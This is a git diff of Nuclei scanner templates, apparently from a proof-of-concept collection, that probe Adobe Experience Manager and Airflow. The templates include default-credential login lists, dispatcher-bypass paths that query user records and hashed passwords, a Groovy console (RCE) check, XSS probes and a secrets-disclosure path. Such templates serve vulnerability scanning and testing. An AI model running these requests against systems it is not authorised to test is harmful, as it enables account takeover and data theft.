Origin: {{BaseURL}} - Referer: {{BaseURL}}/libs/granite/core/content/login.html - - _charset_=utf-8&j_username={{aem_user}}&j_password={{aem_pass}}&j_validate=true - - attack: pitchfork - payloads: - aem_user: - - admin - - grios - - replication-receiver - - vgnadmin - - author - - anonymous - - jdoe@geometrixx.info - - aparker@geometrixx.info - aem_pass: - - admin - - password - - replication-receiver - - vgnadmin - - author - - anonymous - - jdoe - - aparker - stop-at-first-match: true - - matchers-condition: and - matchers: - - type: status - status: - - 200 - - - type: word - part: header - words: - - login-token - - crx.default - condition: and - -# digest: 4a0a004730450220222a3b892a7451300a85043c153a1fbe5d336d8c9f30c474065214bbac5906bc022100981335810687d458df2fb4ca0c7698ec9597777f599956f12f0a62b18f285727:922c64590222798bb761d5b6d8e72950 diff --git a/poc/adobe/aem-default-login.yaml b/poc/adobe/aem-default-login.yaml new file mode 100644 index 0000000000..8072025a73 --- /dev/null +++ b/poc/adobe/aem-default-login.yaml @@ -0,0 +1,56 @@ +id: aem-default-login + +info: + name: Adobe AEM Default Login + author: random-robbie + severity: high + description: Adobe AEM default login credentials were discovered. + reference: + - https://experienceleague.adobe.com/docs/experience-manager-64/administering/security/security-checklist.html?lang=en + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L + cvss-score: 8.3 + cwe-id: CWE-522 + tags: aem,default-login,adobe + + +requests: + - raw: + - | + POST /libs/granite/core/content/login.html/j_security_check HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded; charset=UTF-8 + Origin: {{BaseURL}} + Referer: {{BaseURL}}/libs/granite/core/content/login.html + + _charset_=utf-8&j_username={{aem_user}}&j_password={{aem_pass}}&j_validate=true + + attack: pitchfork + payloads: + aem_user: + - admin + - grios + - replication-receiver + - vgnadmin + + aem_pass: + - admin + - password + - replication-receiver + - vgnadmin + + stop-at-first-match: true + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + part: header + condition: and + words: + - login-token + - crx.default + +# Enhanced by mp on 2022/03/23 diff --git a/poc/adobe/aem-detection-146.yaml b/poc/adobe/aem-detection-146.yaml index 421bb35f54..bb3d7e0753 100644 --- a/poc/adobe/aem-detection-146.yaml +++ b/poc/adobe/aem-detection-146.yaml @@ -2,9 +2,8 @@ id: aem-detection info: name: Favicon based AEM Detection - severity: info author: shifacyclewala,hackergautam - tags: aem,favicon,tech + severity: info reference: - https://twitter.com/brsn76945860/status/1171233054951501824 - https://gist.github.com/yehgdotnet/b9dfc618108d2f05845c4d8e28c5fc6a @@ -13,6 +12,7 @@ info: - https://github.com/sansatart/scrapts/blob/master/shodan-favicon-hashes.csv metadata: shodan-query: http.component:"Adobe Experience Manager" + tags: aem,favicon,tech,adobe requests: - method: GET @@ -25,4 +25,4 @@ requests: matchers: - type: dsl dsl: - - "status_code==200 && (\"-144483185\" == mmh3(base64_py(body)))" \ No newline at end of file + - "status_code==200 && (\"-144483185\" == mmh3(base64_py(body)))" diff --git a/poc/adobe/aem-gql-servlet-149.yaml b/poc/adobe/aem-gql-servlet-149.yaml deleted file mode 100644 index 977dc70f75..0000000000 --- a/poc/adobe/aem-gql-servlet-149.yaml +++ /dev/null @@ -1,56 +0,0 @@ -id: aem-gql-servlet - -info: - name: AEM GQLServlet - author: dhiyaneshDk,prettyboyaaditya - severity: low - reference: - - https://helpx.adobe.com/experience-manager/6-3/sites/developing/using/reference-materials/javadoc/index.html?org/apache/jackrabbit/commons/query/GQL.html - tags: aem - -requests: - - method: GET - path: - - '{{BaseURL}}/bin/wcm/search/gql.json?query=type:User%20limit:..1&pathPrefix=&p.ico' - - '{{BaseURL}}/bin/wcm/search/gql.servlet.json?query=type:base%20limit:..1&pathPrefix=' - - '{{BaseURL}}/bin/wcm/search/gql.json?query=type:base%20limit:..1&pathPrefix=' - - '{{BaseURL}}/bin/wcm/search/gql.json/a.1.json?query=type:base%20limit:..1&pathPrefix=' - - '{{BaseURL}}/bin/wcm/search/gql.json/a.4.2.1...json?query=type:base%20limit:..1&pathPrefix=' - - '{{BaseURL}}/bin/wcm/search/gql.json;%0aa.css?query=type:base%20limit:..1&pathPrefix=' - - '{{BaseURL}}/bin/wcm/search/gql.json;%0aa.html?query=type:base%20limit:..1&pathPrefix=' - - '{{BaseURL}}/bin/wcm/search/gql.json;%0aa.js?query=type:base%20limit:..1&pathPrefix=' - - '{{BaseURL}}/bin/wcm/search/gql.json;%0aa.png?query=type:base%20limit:..1&pathPrefix=' - - '{{BaseURL}}/bin/wcm/search/gql.json;%0aa.ico?query=type:base%20limit:..1&pathPrefix=' - - '{{BaseURL}}/bin/wcm/search/gql.json/a.css?query=type:base%20limit:..1&pathPrefix=' - - '{{BaseURL}}/bin/wcm/search/gql.json/a.js?query=type:base%20limit:..1&pathPrefix=' - - '{{BaseURL}}/bin/wcm/search/gql.json/a.ico?query=type:base%20limit:..1&pathPrefix=' - - '{{BaseURL}}/bin/wcm/search/gql.json/a.png?query=type:base%20limit:..1&pathPrefix=' - - '{{BaseURL}}/bin/wcm/search/gql.json/a.html?query=type:base%20limit:..1&pathPrefix=' - - '{{BaseURL}}///bin///wcm///search///gql.servlet.json?query=type:base%20limit:..1&pathPrefix=' - - '{{BaseURL}}///bin///wcm///search///gql.json?query=type:base%20limit:..1&pathPrefix=' - - '{{BaseURL}}///bin///wcm///search///gql.json///a.1.json?query=type:base%20limit:..1&pathPrefix=' - - '{{BaseURL}}///bin///wcm///search///gql.json///a.4.2.1...json?query=type:base%20limit:..1&pathPrefix=' - - '{{BaseURL}}///bin///wcm///search///gql.json;%0aa.css?query=type:base%20limit:..1&pathPrefix=' - - '{{BaseURL}}///bin///wcm///search///gql.json;%0aa.js?query=type:base%20limit:..1&pathPrefix=' - - '{{BaseURL}}///bin///wcm///search///gql.json;%0aa.html?query=type:base%20limit:..1&pathPrefix=' - - '{{BaseURL}}///bin///wcm///search///gql.json;%0aa.png?query=type:base%20limit:..1&pathPrefix=' - - '{{BaseURL}}///bin///wcm///search///gql.json;%0aa.ico?query=type:base%20limit:..1&pathPrefix=' - - '{{BaseURL}}///bin///wcm///search///gql.json///a.css?query=type:base%20limit:..1&pathPrefix=' - - '{{BaseURL}}///bin///wcm///search///gql.json///a.ico?query=type:base%20limit:..1&pathPrefix=' - - '{{BaseURL}}///bin///wcm///search///gql.json///a.png?query=type:base%20limit:..1&pathPrefix=' - - '{{BaseURL}}///bin///wcm///search///gql.json///a.js?query=type:base%20limit:..1&pathPrefix=' - - '{{BaseURL}}///bin///wcm///search///gql.json///a.html?query=type:base%20limit:..1&pathPrefix=' - - stop-at-first-match: true - matchers-condition: and - matchers: - - type: status - status: - - 200 - - - type: word - words: - - 'excerpt' - - 'path' - - 'hits' - condition: and diff --git a/poc/adobe/aem-gql-servlet-150.yaml b/poc/adobe/aem-gql-servlet-150.yaml new file mode 100644 index 0000000000..36a597b300 --- /dev/null +++ b/poc/adobe/aem-gql-servlet-150.yaml @@ -0,0 +1,26 @@ +id: aem-gql-servlet + +info: + author: DhiyaneshDk + name: AEM GQLServlet + severity: low + reference: https://helpx.adobe.com/experience-manager/6-3/sites/developing/using/reference-materials/javadoc/index.html?org/apache/jackrabbit/commons/query/GQL.html + tags: aem + + +requests: + - method: GET + path: + - '{{BaseURL}}/bin/wcm/search/gql.json?query=type:User%20limit:..1&pathPrefix=&p.ico' + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - 'excerpt' + - 'path' + - 'hits' + condition: and diff --git a/poc/adobe/aem-groovyconsole-151.yaml b/poc/adobe/aem-groovyconsole-151.yaml index 11178dfc03..c53445d395 100644 --- a/poc/adobe/aem-groovyconsole-151.yaml +++ b/poc/adobe/aem-groovyconsole-151.yaml @@ -1,22 +1,19 @@ id: aem-groovyconsole info: name: AEM Groovy console enabled - author: Dheerajmadhukar + author: twitter.com/Dheerajmadhukar severity: critical description: Groovy console is exposed, RCE is possible. - reference: - - https://hackerone.com/reports/672243 - - https://twitter.com/XHackerx007/status/1435139576314671105 + reference: https://hackerone.com/reports/672243 tags: aem requests: - method: GET path: - "{{BaseURL}}/groovyconsole" - - "{{BaseURL}}/etc/groovyconsole.html" headers: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Accept-Language: en-US,en;q=0.9,hi;q=0.8 - stop-at-first-match: true + User-Agent: Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Mobile Safari/537.36 matchers-condition: and matchers: - type: word diff --git a/poc/adobe/aem-groovyconsole-153.yaml b/poc/adobe/aem-groovyconsole-153.yaml new file mode 100644 index 0000000000..2d05325869 --- /dev/null +++ b/poc/adobe/aem-groovyconsole-153.yaml @@ -0,0 +1,37 @@ +id: aem-groovyconsole + +info: + name: AEM Groovy Console Discovery + author: Dheerajmadhukar + severity: critical + description: An Adobe Experience Manager Groovy console was discovered. This can possibly lead to remote code execution. + reference: + - https://hackerone.com/reports/672243 + - https://twitter.com/XHackerx007/status/1435139576314671105 + tags: aem,adobe + +requests: + - method: GET + path: + - "{{BaseURL}}/groovyconsole" + - "{{BaseURL}}/etc/groovyconsole.html" + headers: + Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 + Accept-Language: en-US,en;q=0.9,hi;q=0.8 + + stop-at-first-match: true + matchers-condition: and + matchers: + - type: word + words: + - "Groovy Console" + - "Run Script" + - "Groovy Web Console" + part: body + condition: and + + - type: status + status: + - 200 + +# Enhanced by mp on 2022/04/22 diff --git a/poc/adobe/aem-groovyconsole-154.yaml b/poc/adobe/aem-groovyconsole-154.yaml deleted file mode 100644 index c53445d395..0000000000 --- a/poc/adobe/aem-groovyconsole-154.yaml +++ /dev/null @@ -1,28 +0,0 @@ -id: aem-groovyconsole -info: - name: AEM Groovy console enabled - author: twitter.com/Dheerajmadhukar - severity: critical - description: Groovy console is exposed, RCE is possible. - reference: https://hackerone.com/reports/672243 - tags: aem -requests: - - method: GET - path: - - "{{BaseURL}}/groovyconsole" - headers: - Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 - Accept-Language: en-US,en;q=0.9,hi;q=0.8 - User-Agent: Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Mobile Safari/537.36 - matchers-condition: and - matchers: - - type: word - words: - - "Groovy Console" - - "Run Script" - - "Groovy Web Console" - part: body - condition: and - - type: status - status: - - 200 diff --git a/poc/adobe/aem-hash-querybuilder-159.yaml b/poc/adobe/aem-hash-querybuilder-159.yaml new file mode 100644 index 0000000000..cd202b5e1c --- /dev/null +++ b/poc/adobe/aem-hash-querybuilder-159.yaml @@ -0,0 +1,30 @@ +id: aem-hash-querybuilder + +info: + name: Query hashed password via QueryBuilder Servlet + author: DhiyaneshDk + severity: medium + reference: + - https://twitter.com/AEMSecurity/status/1372392101829349376 + tags: aem + +requests: + - raw: + - | + GET /bin/querybuilder.json.;%0aa.css?p.hits=full&property=rep:authorizableId&type=rep:User HTTP/1.1 + Host: {{Hostname}} + Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 + Accept-Language: en-US,en;q=0.5 + Accept-Encoding: gzip, deflate + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - '"success":true' + - 'rep:password' + condition: and \ No newline at end of file diff --git a/poc/adobe/aem-hash-querybuilder-161.yaml b/poc/adobe/aem-hash-querybuilder-161.yaml deleted file mode 100644 index 50ae6efbd4..0000000000 --- a/poc/adobe/aem-hash-querybuilder-161.yaml +++ /dev/null @@ -1,29 +0,0 @@ -id: aem-hash-querybuilder - -info: - author: DhiyaneshDk - name: Query hashed password via QueryBuilder Servlet - severity: medium - reference: https://twitter.com/AEMSecurity/status/1372392101829349376 - tags: aem - -requests: - - raw: - - | - GET /bin/querybuilder.json.;%0aa.css?p.hits=full&property=rep:authorizableId&type=rep:User HTTP/1.1 - Host: {{Hostname}} - Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 - Accept-Language: en-US,en;q=0.5 - Accept-Encoding: gzip, deflate - - matchers-condition: and - matchers: - - type: status - status: - - 200 - - - type: word - words: - - '"success":true' - - 'rep:password' - condition: and \ No newline at end of file diff --git a/poc/adobe/aem-jcr-querybuilder-162.yaml b/poc/adobe/aem-jcr-querybuilder-162.yaml deleted file mode 100644 index c5ff1dc771..0000000000 --- a/poc/adobe/aem-jcr-querybuilder-162.yaml +++ /dev/null @@ -1,33 +0,0 @@ -id: aem-jcr-querybuilder - -info: - name: Query JCR role via QueryBuilder Servlet - author: DhiyaneshDk - severity: info - metadata: - max-request: 1 - shodan-query: http.component:"Adobe Experience Manager" - tags: aem,misconfig - -http: - - raw: - - | - GET /bin/querybuilder.json.;%0aa.css?p.hits=full&property=rep:authorizableId&type=rep:User HTTP/1.1 - Host: {{Hostname}} - Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 - Accept-Language: en-US,en;q=0.5 - Accept-Encoding: gzip, deflate - - matchers-condition: and - matchers: - - type: status - status: - - 200 - - - type: word - words: - - '"success":true' - - 'jcr:uuid' - condition: and - -# digest: 4a0a004730450221008365eca02e6217a90a81158a8c3d0fe5bee5715380b46a141b9a50a21c5776fa02207553b8de50c5bdea729d644da1ca6ea5b01c6368aaed4399fe8b947d908ddcbd:922c64590222798bb761d5b6d8e72950 diff --git a/poc/adobe/aem-login-status-169.yaml b/poc/adobe/aem-login-status-169.yaml deleted file mode 100644 index 6c6ccdcea5..0000000000 --- a/poc/adobe/aem-login-status-169.yaml +++ /dev/null @@ -1,35 +0,0 @@ -id: aem-login-status - -info: - name: AEM Login Status - author: DhiyaneshDk - severity: info - description: LoginStatusServlet is exposed, it allows to bruteforce credentials. - reference: - - https://www.slideshare.net/0ang3el/hunting-for-security-bugs-in-aem-webapps-129262212 - - https://github.com/thomashartm/burp-aem-scanner/blob/master/src/main/java/burp/actions/dispatcher/LoginStatusServletExposed.java - metadata: - max-request: 3 - shodan-query: http.component:"Adobe Experience Manager" - tags: aem,adobe,misconfig - -http: - - method: GET - path: - - '{{BaseURL}}/system/sling/loginstatus' - - '{{BaseURL}}/system/sling/loginstatus.css' - - '{{BaseURL}}///system///sling///loginstatus' - - stop-at-first-match: true - - matchers-condition: and - matchers: - - type: status - status: - - 200 - - - type: word - words: - - 'CREDENTIAL_CHALLENGE' - -# digest: 4a0a0047304502203d588dfb867f6570608796de1e9e4fd6377b9423f492dcc6166121425133a35a022100a854db9f3c2f05923fb27a7ec79de8428a1164b62a07806c77b94f0ec83abf47:922c64590222798bb761d5b6d8e72950 diff --git a/poc/adobe/aem-merge-metadata-servlet-172.yaml b/poc/adobe/aem-merge-metadata-servlet-172.yaml index 0f174a63fe..7f4a093732 100644 --- a/poc/adobe/aem-merge-metadata-servlet-172.yaml +++ b/poc/adobe/aem-merge-metadata-servlet-172.yaml @@ -1,17 +1,21 @@ id: aem-merge-metadata-servlet info: - author: DhiyaneshDk name: AEM MergeMetadataServlet + author: DhiyaneshDk severity: info - reference: https://speakerdeck.com/0ang3el/aem-hacker-approaching-adobe-experience-manager-webapps-in-bug-bounty-programs?slide=91 - tags: aem - + reference: + - https://speakerdeck.com/0ang3el/aem-hacker-approaching-adobe-experience-manager-webapps-in-bug-bounty-programs?slide=91 + metadata: + max-request: 1 + shodan-query: http.component:"Adobe Experience Manager" + tags: aem,misconfig -requests: +http: - method: GET path: - '{{BaseURL}}/libs/dam/merge/metadata.html?path=/etc&.ico' + matchers-condition: and matchers: - type: status @@ -22,3 +26,5 @@ requests: words: - 'assetPaths' condition: and + +# digest: 4a0a0047304502204c5922229b04b36c72ca391555bf2cbb57bca10d36b6281cd4d4f7677fc222fa022100b04f9edf21b17af0df74d22e4d9de9706c52fe5a1e4ab6ef1d0f725d81bb0c7c:922c64590222798bb761d5b6d8e72950 diff --git a/poc/adobe/aem-merge-metadata-servlet.yaml b/poc/adobe/aem-merge-metadata-servlet-174.yaml similarity index 100% rename from poc/adobe/aem-merge-metadata-servlet.yaml rename to poc/adobe/aem-merge-metadata-servlet-174.yaml diff --git a/poc/adobe/aem-querybuilder-feed-servlet-175.yaml b/poc/adobe/aem-querybuilder-feed-servlet-175.yaml deleted file mode 100644 index 4f840f4bca..0000000000 --- a/poc/adobe/aem-querybuilder-feed-servlet-175.yaml +++ /dev/null @@ -1,23 +0,0 @@ -id: aem-querybuilder-feed-servlet - -info: - author: DhiyaneshDk - name: AEM QueryBuilder Feed Servlet - severity: info - reference: https://helpx.adobe.com/experience-manager/6-3/sites/developing/using/querybuilder-predicate-reference.html - tags: aem - - -requests: - - method: GET - path: - - '{{BaseURL}}/bin/querybuilder.feed' - matchers-condition: and - matchers: - - type: status - status: - - 200 - - - type: word - words: - - 'CQ Feed' \ No newline at end of file diff --git a/poc/adobe/aem-querybuilder-feed-servlet-177.yaml b/poc/adobe/aem-querybuilder-feed-servlet-177.yaml new file mode 100644 index 0000000000..b180cc6888 --- /dev/null +++ b/poc/adobe/aem-querybuilder-feed-servlet-177.yaml @@ -0,0 +1,23 @@ +id: aem-querybuilder-feed-servlet + +info: + name: AEM QueryBuilder Feed Servlet + author: DhiyaneshDk + severity: info + reference: + - https://helpx.adobe.com/experience-manager/6-3/sites/developing/using/querybuilder-predicate-reference.html + tags: aem + +requests: + - method: GET + path: + - '{{BaseURL}}/bin/querybuilder.feed' + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - 'CQ Feed' \ No newline at end of file diff --git a/poc/adobe/aem-querybuilder-feed-servlet.yaml b/poc/adobe/aem-querybuilder-feed-servlet.yaml index b180cc6888..4f840f4bca 100644 --- a/poc/adobe/aem-querybuilder-feed-servlet.yaml +++ b/poc/adobe/aem-querybuilder-feed-servlet.yaml @@ -1,13 +1,13 @@ id: aem-querybuilder-feed-servlet info: - name: AEM QueryBuilder Feed Servlet author: DhiyaneshDk + name: AEM QueryBuilder Feed Servlet severity: info - reference: - - https://helpx.adobe.com/experience-manager/6-3/sites/developing/using/querybuilder-predicate-reference.html + reference: https://helpx.adobe.com/experience-manager/6-3/sites/developing/using/querybuilder-predicate-reference.html tags: aem + requests: - method: GET path: diff --git a/poc/adobe/aem-querybuilder-internal-path-read-180.yaml b/poc/adobe/aem-querybuilder-internal-path-read-180.yaml new file mode 100644 index 0000000000..5e8033b220 --- /dev/null +++ b/poc/adobe/aem-querybuilder-internal-path-read-180.yaml @@ -0,0 +1,24 @@ +id: aem-querybuilder-internal-path-read +info: + author: DhiyaneshDk + name: AEM QueryBuilder Internal Path Read + severity: medium + reference: https://speakerdeck.com/0ang3el/aem-hacker-approaching-adobe-experience-manager-webapps-in-bug-bounty-programs?slide=91 + tags: aem +requests: + - method: GET + path: + - '{{BaseURL}}/bin/querybuilder.json.;%0aa.css?path=/home&p.hits=full&p.limit=-1' + - '{{BaseURL}}/bin/querybuilder.json.;%0aa.css?path=/etc&p.hits=full&p.limit=-1' + - '{{BaseURL}}/bin/querybuilder.json.css?path=/home&p.hits=full&p.limit=-1' + - '{{BaseURL}}/bin/querybuilder.json.css?path=/etc&p.hits=full&p.limit=-1' + matchers-condition: and + matchers: + - type: status + status: + - 200 + - type: word + words: + - 'jcr:path' + - 'success' + condition: and diff --git a/poc/adobe/aem-querybuilder-internal-path-read-181.yaml b/poc/adobe/aem-querybuilder-internal-path-read-181.yaml deleted file mode 100644 index f088c74a61..0000000000 --- a/poc/adobe/aem-querybuilder-internal-path-read-181.yaml +++ /dev/null @@ -1,30 +0,0 @@ -id: aem-querybuilder-internal-path-read - -info: - author: DhiyaneshDk - name: AEM QueryBuilder Internal Path Read - severity: medium - reference: https://speakerdeck.com/0ang3el/aem-hacker-approaching-adobe-experience-manager-webapps-in-bug-bounty-programs?slide=91 - tags: aem - - -requests: - - method: GET - path: - - '{{BaseURL}}/bin/querybuilder.json.;%0aa.css?path=/home&p.hits=full&p.limit=-1' - - '{{BaseURL}}/bin/querybuilder.json.;%0aa.css?path=/etc&p.hits=full&p.limit=-1' - - '{{BaseURL}}/bin/querybuilder.json.css?path=/home&p.hits=full&p.limit=-1' - - '{{BaseURL}}/bin/querybuilder.json.css?path=/etc&p.hits=full&p.limit=-1' - - stop-at-first-match: true - matchers-condition: and - matchers: - - type: status - status: - - 200 - - - type: word - words: - - 'jcr:path' - - 'success' - condition: and \ No newline at end of file diff --git a/poc/adobe/aem-querybuilder-internal-path-read.yaml b/poc/adobe/aem-querybuilder-internal-path-read.yaml index 5d7818ebca..f088c74a61 100644 --- a/poc/adobe/aem-querybuilder-internal-path-read.yaml +++ b/poc/adobe/aem-querybuilder-internal-path-read.yaml @@ -1,17 +1,14 @@ id: aem-querybuilder-internal-path-read info: - name: AEM QueryBuilder Internal Path Read author: DhiyaneshDk + name: AEM QueryBuilder Internal Path Read severity: medium - reference: - - https://speakerdeck.com/0ang3el/aem-hacker-approaching-adobe-experience-manager-webapps-in-bug-bounty-programs?slide=91 - metadata: - max-request: 4 - shodan-query: http.component:"Adobe Experience Manager" - tags: aem,misconfig + reference: https://speakerdeck.com/0ang3el/aem-hacker-approaching-adobe-experience-manager-webapps-in-bug-bounty-programs?slide=91 + tags: aem + -http: +requests: - method: GET path: - '{{BaseURL}}/bin/querybuilder.json.;%0aa.css?path=/home&p.hits=full&p.limit=-1' @@ -20,7 +17,6 @@ http: - '{{BaseURL}}/bin/querybuilder.json.css?path=/etc&p.hits=full&p.limit=-1' stop-at-first-match: true - matchers-condition: and matchers: - type: status @@ -31,6 +27,4 @@ http: words: - 'jcr:path' - 'success' - condition: and - -# digest: 4a0a00473045022036a84c77fa98147a44845f1a12d95b4757094f2b4d956d3a14a1ae363b861e550221008e10cb2f1ce0993c3efc76bffcbbde1d3235cb843acf1710de4d763277f4f12b:922c64590222798bb761d5b6d8e72950 + condition: and \ No newline at end of file diff --git a/poc/adobe/aem-secrets.yaml b/poc/adobe/aem-secrets.yaml new file mode 100644 index 0000000000..4ac0aaf165 --- /dev/null +++ b/poc/adobe/aem-secrets.yaml @@ -0,0 +1,44 @@ +id: aem-secrets + +info: + name: AEM Secrets - Sensitive Information Disclosure + author: j3ssie & boobooHQ + severity: high + reference: + - https://www.linkedin.com/feed/update/urn:li:activity:7066003031271616513/ + description: | + Possible Juicy Files can be discovered at this endpoint. Search / Grep for secrets like hashed passwords ( SHA ) , internal email disclosure etc. + metadata: + max-request: 2 + verified: "true" + tags: aem,adobe,misconfig,exposure + +requests: + - method: GET + path: + - "{{BaseURL}}//content/dam/formsanddocuments.form.validator.html/home/....children.tidy...infinity..json" + - "{{BaseURL}}/..;//content/dam/formsanddocuments.form.validator.html/home/....children.tidy...infinity..json" + + headers: + Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 + Accept-Language: en-US,en;q=0.9,hi;q=0.8 + + stop-at-first-match: true + matchers-condition: and + matchers: + - type: word + part: body + words: + - '"jcr:uuid"' + - '"jcr:createdBy"' + - '"uri"' + condition: and + + - type: word + part: header + words: + - application/json + + - type: status + status: + - 200 diff --git a/poc/adobe/aem-setpreferences-xss-189.yaml b/poc/adobe/aem-setpreferences-xss-189.yaml index 50e7da80ff..87462f5774 100644 --- a/poc/adobe/aem-setpreferences-xss-189.yaml +++ b/poc/adobe/aem-setpreferences-xss-189.yaml @@ -1,13 +1,13 @@ id: aem-setpreferences-xss info: - name: AEM setPreferences XSS + name: AEM setPreferences - Cross-Site Scripting author: zinminphy0,dhiyaneshDK + severity: medium reference: - https://www.youtube.com/watch?v=VwLSUHNhrOw&t=142s - https://github.com/projectdiscovery/nuclei-templates/issues/3225 - https://twitter.com/zin_min_phyo/status/1465394815042916352 - severity: medium tags: aem,xss requests: @@ -27,4 +27,4 @@ requests: - type: status status: - - 400 \ No newline at end of file + - 400 diff --git a/poc/adobe/aem-setpreferences-xss.yaml b/poc/adobe/aem-setpreferences-xss.yaml new file mode 100644 index 0000000000..50e7da80ff --- /dev/null +++ b/poc/adobe/aem-setpreferences-xss.yaml @@ -0,0 +1,30 @@ +id: aem-setpreferences-xss + +info: + name: AEM setPreferences XSS + author: zinminphy0,dhiyaneshDK + reference: + - https://www.youtube.com/watch?v=VwLSUHNhrOw&t=142s + - https://github.com/projectdiscovery/nuclei-templates/issues/3225 + - https://twitter.com/zin_min_phyo/status/1465394815042916352 + severity: medium + tags: aem,xss + +requests: + - method: GET + path: + - "{{BaseURL}}/crx/de/setPreferences.jsp;%0A.html?language=en&keymap=//a" + - "{{BaseURL}}/content/crx/de/setPreferences.jsp;%0A.html?language=en&keymap=//a" + + stop-at-first-match: true + matchers-condition: and + matchers: + - type: word + words: + - "" + - 'A JSONObject text must begin with' + condition: and + + - type: status + status: + - 400 \ No newline at end of file diff --git a/poc/adobe/aem-userinfo-servlet-193.yaml b/poc/adobe/aem-userinfo-servlet-193.yaml index 01684b7d96..0fe58a4195 100644 --- a/poc/adobe/aem-userinfo-servlet-193.yaml +++ b/poc/adobe/aem-userinfo-servlet-193.yaml @@ -4,8 +4,8 @@ info: author: DhiyaneshDk name: AEM UserInfo Servlet severity: info - description: UserInfoServlet is exposed which allows an attacker to bruteforce credentials. You can get valid usernames from jcr:createdBy, jcr:lastModifiedBy, cq:LastModifiedBy attributes of any JCR node. - tags: aem,bruteforce + description: UserInfoServlet is exposed, it allows to bruteforce credentials. You can get valid usernames from jcr:createdBy, jcr:lastModifiedBy, cq:LastModifiedBy attributes of any JCR node. + tags: aem requests: @@ -19,13 +19,7 @@ requests: - 200 - type: word - part: body words: - - '"userID":' - - '"userName":' + - 'userName' + - 'userID' condition: and - - - type: word - part: header - words: - - 'application/json' diff --git a/poc/adobe/aem-xss-childlist-selector-198.yaml b/poc/adobe/aem-xss-childlist-selector-198.yaml index 6692f5b45e..c8551970bf 100644 --- a/poc/adobe/aem-xss-childlist-selector-198.yaml +++ b/poc/adobe/aem-xss-childlist-selector-198.yaml @@ -24,6 +24,8 @@ requests: - type: word words: - '' + - '{"path":"/etc/designs/xh1x.childrenlist.json' + condition: and - type: word part: header diff --git a/poc/adobe/possible-AEM-secrets.yaml b/poc/adobe/possible-AEM-secrets.yaml deleted file mode 100644 index 198c19fcd3..0000000000 --- a/poc/adobe/possible-AEM-secrets.yaml +++ /dev/null @@ -1,46 +0,0 @@ -id: aem-secrets - -info: - name: AEM Secrets - Sensitive Information Disclosure - author: boobooHQ,j3ssie - severity: high - description: | - Possible Juicy Files can be discovered at this endpoint. Search / Grep for secrets like hashed passwords ( SHA ) , internal email disclosure etc. - reference: - - https://www.linkedin.com/feed/update/urn:li:activity:7066003031271616513/ - metadata: - verified: true - max-request: 2 - tags: aem,adobe,misconfig,exposure - -http: - - method: GET - path: - - "{{BaseURL}}//content/dam/formsanddocuments.form.validator.html/home/....children.tidy...infinity..json" - - "{{BaseURL}}/..;//content/dam/formsanddocuments.form.validator.html/home/....children.tidy...infinity..json" - - headers: - Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 - Accept-Language: en-US,en;q=0.9,hi;q=0.8 - stop-at-first-match: true - - matchers-condition: and - matchers: - - type: word - part: body - words: - - '"jcr:uuid"' - - '"jcr:createdBy"' - - '"uri"' - condition: and - - - type: word - part: header - words: - - application/json - - - type: status - status: - - 200 - -# digest: 4b0a00483046022100f26aef400ffc895f1d84d377c7c8889af3a56490902382de4d7e2504f59b48bc02210090f54e744e9f760d4a740a9b6d7fe6a61d4904e4823b4d43318598fd8b2b10ce:922c64590222798bb761d5b6d8e72950 diff --git a/poc/airflow/airflow-debug-231.yaml b/poc/airflow/airflow-debug-231.yaml deleted file mode 100644 index dc6f4a4a58..0000000000 --- a/poc/airflow/airflow-debug-231.yaml +++ /dev/null @@ -1,26 +0,0 @@ -id: airflow-debug - -info: - name: Airflow Debug Trace - author: pdteam - severity: low - tags: apache,airflow,fpd - -requests: - - method: GET - path: - - "{{BaseURL}}/admin/airflow/login" - - matchers-condition: and - matchers: - - - type: word - part: body - words: - - "

Ooops.

" - - "Traceback (most recent call last)" - condition: and - - - type: status - status: - - 500 \ No newline at end of file diff --git a/poc/airflow/airflow-debug-233.yaml b/poc/airflow/airflow-debug-233.yaml new file mode 100644 index 0000000000..7e88c457d2 --- /dev/null +++ b/poc/airflow/airflow-debug-233.yaml @@ -0,0 +1,29 @@ +id: airflow-debug + +info: + name: Airflow Debug Trace + author: pdteam + severity: low + metadata: + verified: true + shodan-query: title:"Airflow - DAGs" + tags: apache,airflow,fpd + +requests: + - method: GET + path: + - "{{BaseURL}}/admin/airflow/login" + + matchers-condition: and + matchers: + + - type: word + part: body + words: + - "

Ooops.

